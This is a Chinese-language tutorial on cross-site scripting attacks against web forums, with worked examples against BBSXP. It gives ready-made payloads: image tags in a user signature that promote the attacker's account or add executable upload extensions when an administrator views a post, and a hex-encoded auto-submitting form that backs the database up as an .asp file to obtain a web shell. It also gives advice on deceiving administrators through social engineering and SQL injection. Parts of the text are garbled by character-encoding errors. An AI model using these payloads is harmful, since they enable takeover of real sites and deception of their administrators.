總體上介紹
簡(jiǎn)單介紹什么是XSS攻擊
如何尋找XSS漏洞
對(duì)于XSS攻擊的總體思路
來(lái)自?xún)?nèi)部的攻擊:
如何尋找內(nèi)部的XSS漏洞
如何構(gòu)造攻擊
如何利用
結(jié)何實(shí)例攻擊，如DVBBS&BBSXP
來(lái)自外部的攻擊
如何構(gòu)造XSS攻擊
如何欺騙管理員打開(kāi)
XSS與其它技術(shù)的結(jié)何
與mssql injection的結(jié)合
QQ跨站的結(jié)何
國(guó)內(nèi)大型統(tǒng)計(jì)網(wǎng)站的跨站漏洞
社會(huì)工程學(xué)
制作恐怖的flash木馬
制作方法由李豐初寫(xiě)
總結(jié) 
正文:
XSS總體介紹
什么是XSS攻擊
XSS又叫CSS  (Cross Site Script) ，跨站腳本攻擊。它指的是惡意攻擊者往Web頁(yè)面里插入惡意html代碼，當(dāng)用戶(hù)瀏覽該頁(yè)之時(shí)，嵌入其中Web里面的html代碼會(huì)被執(zhí)行，從而達(dá)到惡意用戶(hù)的特殊目的。XSS屬于被動(dòng)式的攻擊，因?yàn)槠浔粍?dòng)且不好利用，所以許多人常呼略其危害性。而本文主要講的是利用XSS得到目標(biāo)服務(wù)器的shell。技術(shù)雖然是老技術(shù)，但是其思路希望對(duì)大家有幫助。
如何尋找XSS漏洞
就個(gè)人而言，我把XSS攻擊分成兩類(lèi)，一類(lèi)是來(lái)自?xún)?nèi)部的攻擊，主要指的是利用程序自身的漏洞，構(gòu)造跨站語(yǔ)句，如:dvbbs的showerror.asp存在的跨站漏洞。另一類(lèi)則是來(lái)來(lái)自外部的攻擊，主要指的自己構(gòu)造XSS跨站漏洞網(wǎng)頁(yè)或者尋找非目標(biāo)機(jī)以外的有跨站漏洞的網(wǎng)頁(yè)。如當(dāng)我們要滲透一個(gè)站點(diǎn)，我們自己構(gòu)造一個(gè)有跨站漏洞的網(wǎng)頁(yè)，然后構(gòu)造跨站語(yǔ)句，通過(guò)結(jié)合其它技術(shù)，如社會(huì)工程學(xué)等，欺騙目標(biāo)服務(wù)器的管理員打開(kāi)。
然后利用下面的技術(shù)得到一個(gè)shell.
如何利用
傳統(tǒng)的跨站利用方式一般都是攻擊者先構(gòu)造一個(gè)跨站網(wǎng)頁(yè)，然后在另一空間里放一個(gè)收集cookie的頁(yè)面，接著結(jié)合其它技術(shù)讓用戶(hù)打開(kāi)跨站頁(yè)面以盜取用戶(hù)的cookie，以便進(jìn)一步的攻擊。個(gè)人認(rèn)為這種方式太過(guò)于落后，對(duì)于弊端大家可能都知道，因?yàn)榧幢隳闶占搅薱ookie你也未必能進(jìn)一步滲透進(jìn)去，多數(shù)的cookie里面的密碼都是經(jīng)過(guò)加密的，如果想要cookie欺騙的話(huà)，同樣也要受到其它的條件的限約。而本文提出的另一種思路，則從一定程度上解決上述的問(wèn)題。對(duì)于個(gè)人而言，比較成熟的方法是通過(guò)跨站構(gòu)造一個(gè)表單，表單的內(nèi)容則為利用程序的備份功能或者加管理員等功能得到一個(gè)高權(quán)限。下面我將詳細(xì)的介紹這種技術(shù)。
來(lái)自?xún)?nèi)部的跨站攻擊
尋找跨站漏洞
如果有代碼的話(huà)比較好辦，我們主要看代碼里對(duì)用戶(hù)輸入的地方和變量有沒(méi)有做長(zhǎng)度和對(duì)”<”,”>”,”;”,”'”等字符是否做過(guò)濾。還有要注意的是對(duì)于標(biāo)簽的閉合，像測(cè)試QQ群跨站漏洞的時(shí)候，你在標(biāo)題處輸入<script>alert(‘test')</script>，代碼是不會(huì)被執(zhí)行的，因?yàn)樵谠创a里，有其它的標(biāo)簽未閉合，如少了一個(gè)</script>，這個(gè)時(shí)候，你只要閉合一個(gè)</script>，代碼就會(huì)執(zhí)行，如：你在標(biāo)題處輸入</script><script>alert(‘test')</script>，這樣就可以彈出一個(gè)test的框。
如何利用
我先以BBSXP為例，過(guò)程已做成動(dòng)畫(huà)，詳情可見(jiàn)光盤(pán)中的動(dòng)畫(huà)。我舉BBSXP中其中兩個(gè)比較好用的跨站漏洞點(diǎn)為例.
a.先注冊(cè)一個(gè)普通用戶(hù)，我這里注冊(cè)的用戶(hù)是linzi.然后我們?cè)趥€(gè)人簽名里寫(xiě)入:
[img]http://127.0.0.1/bbsxp/admin_user.asp?menu=userok&username=linzi&membercode=5&userlife=1&posttopic=3&money=9&postrevert=0&savemoney=0&deltopic=1&regtime=2005-9-1+1%3A1%3A1&experience=9&country=%D6%D0%B9%FA&&Submit=+%B8%FC+%D0%C2+[/img]

c.然后發(fā)個(gè)貼子，可以結(jié)合其它技術(shù)欺騙管理員瀏覽發(fā)的貼子。
d.因?yàn)槭菧y(cè)試，所以我們以管理員身份登陸，然后打開(kāi)貼子，我們會(huì)發(fā)現(xiàn)，linzi已經(jīng)變成了社區(qū)區(qū)長(zhǎng)工，如圖一所示
    除此之外我們只要在個(gè)人簽名里輸入
[img]http://127.0.0.1/bbsxp/admin_setup.asp?menu=variableok&clubname=+&homename=+&homeurl=&floor=2&PostTime=3&Timeout=6&OnlineTime=12&Reg10=10&style=1&selectup=FSO&MaxFace=10240&MaxPhoto=30720&MaxFile=102400&UpFileGenre=gif|jpg|asp%20|rar[/img]

同樣發(fā)個(gè)貼子等，只要管理員打開(kāi)了，就會(huì)加了一個(gè)擴(kuò)展名為asp （有空格）的上傳擴(kuò)展，這個(gè)時(shí)候，你只要上傳一個(gè)newmm.asp (有空格)就可以得到一個(gè)shell.
    上面的攻擊多多少少有點(diǎn)局限性，雖然可以得到shell，但是隱蔽性不太好，因?yàn)楹灻?nbsp;   
    處受到了長(zhǎng)度的限制，不能超過(guò)255個(gè)字符。我們可以結(jié)合flash跨站實(shí)現(xiàn)更為隱蔽的
    攻擊，對(duì)于flash木馬的制作，下面見(jiàn)哥們豐初的介紹。
    再利用如下:
    修改一下個(gè)人頭像的url,輸入代碼如下:    admin_setup.asp?menu=variableok&clubname=+&homename=+&homeurl=&floor=2&PostTime=3&Timeout=6&OnlineTime=12&Reg10=10&style=1&selectup=FSO&MaxFace=10240&MaxPhoto=30720&MaxFile=102400&UpFileGenre=gif|jpg|php|rar
    再接著欺騙管理員打開(kāi)你的資料或者瀏覽你的貼子，當(dāng)管理員打開(kāi)后，會(huì)在后臺(tái)自動(dòng)加個(gè)php擴(kuò)展名的后輟，因?yàn)閎bsxp在個(gè)人頭像url里過(guò)濾了空格,%，所以我們只能加個(gè)不包括空格的其它擴(kuò)展，當(dāng)然你也可以加個(gè)shtml的擴(kuò)展，有了它你就可以用來(lái)查看源代碼，然后進(jìn)一步攻擊。
三、來(lái)自外部的跨站攻擊
有的時(shí)候，當(dāng)我們對(duì)于目標(biāo)程序找不到可以利用的跨站點(diǎn)，這個(gè)時(shí)候我們可以利用可以從外部入手，利用我們要拿下的是它的論談，論談的安全性做的很好，但其留言板卻存在跨站漏洞，這個(gè)時(shí)候我們可以在留言板里寫(xiě)入跨站語(yǔ)句，跨站語(yǔ)句為以表單的方式向論談提交提升權(quán)限的語(yǔ)句，如上面的bbsxp加asp 擴(kuò)展的語(yǔ)句。當(dāng)然我們可利用后臺(tái)的備份功能直接得到一個(gè)shell。
例:先上傳一個(gè)文件linzi.txt，內(nèi)容如下:
<body onload="javascript:document.forms[0].submit()"><form
action="http://127.0.0.1/bbsxp/admin_fso.asp?menu=bakbf" method="post"><input value="database/bbsxp.mdb" name="yl" ><input value="database/shit.asp" name="bf" ></body></html>

上面的代碼是把論談的數(shù)據(jù)庫(kù)備份為shit.asp，留言板存在跨站點(diǎn)如下:
http://127.0.0.1/bbsxp/page2.asp?username=
我們構(gòu)造備份跨站語(yǔ)句如下:
http://127.0.0.1/bbsxp/page2.asp?username=%3C%62%6F%64%79%20%6F%6E%6C%6F%61%64%3D%22%6A%61%76%61%73%63%72%69%70%74%3A%64%6F%63%75%6D%65%6E%74%2E%66%6F%72%6D%73%5B%30%5D%2E%73%75%62%6D%69%74%28%29%22%3E%3C%66%6F%72%6D%20%61%63%74%69%6F%6E%3D%22%68%74%74%70%3A%2F%2F%31%32%37%2E%30%2E%30%2E%31%2F%62%62%73%78%70%2F%61%64%6D%69%6E%5F%66%73%6F%2E%61%73%70%3F%6D%65%6E%75%3D%62%61%6B%62%66%22%20%6D%65%74%68%6F%64%3D%22%70%6F%73%74%22%3E%3C%69%6E%70%75%74%20%76%61%6C%75%65%3D%22%64%61%74%61%62%61%73%65%2F%62%62%73%78%70%2E%6D%64%62%22%20%6E%61%6D%65%3D%22%79%6C%22%20%3E%3C%69%6E%70%75%74%20%76%61%6C%75%65%3D%22%64%61%74%61%62%61%73%65%2F%73%68%69%74%2E%61%73%70%22%20%6E%61%6D%65%3D%22%62%66%22%20%3E%3C%2F%62%6F%64%79%3E%3C%2F%68%74%6D%6C%3E

或者構(gòu)造跨站語(yǔ)句，利用iframe打開(kāi)一個(gè)0大小的linzi.txt。
當(dāng)管理員打開(kāi)后，會(huì)自動(dòng)備份得到一個(gè)shell.
四、XSS與其它技術(shù)的結(jié)何
   從上面的實(shí)例，我們可以知道，如何欺騙管理打開(kāi)是一個(gè)很重要的步驟，對(duì)于欺騙打開(kāi)，除了社會(huì)工程學(xué)外，我們可以結(jié)合其它的技術(shù)，如sql injection.當(dāng)我們滲透一個(gè)網(wǎng)站之時(shí)，主站mssql注入漏洞，權(quán)限為public,這個(gè)時(shí)候我們利用update構(gòu)造跨站語(yǔ)句，如用iframe打開(kāi)一個(gè)上面的備份得到shell的跨站語(yǔ)句等，同樣，我們可以在社會(huì)工程學(xué)時(shí)，利用QQ的其它跨站漏洞等等。
   總是對(duì)于欺騙也是一門(mén)藝術(shù)，具體怎么利用，大家就發(fā)揮自己的想象力吧！
五、Flash木馬的制作.
 略

最新評(píng)論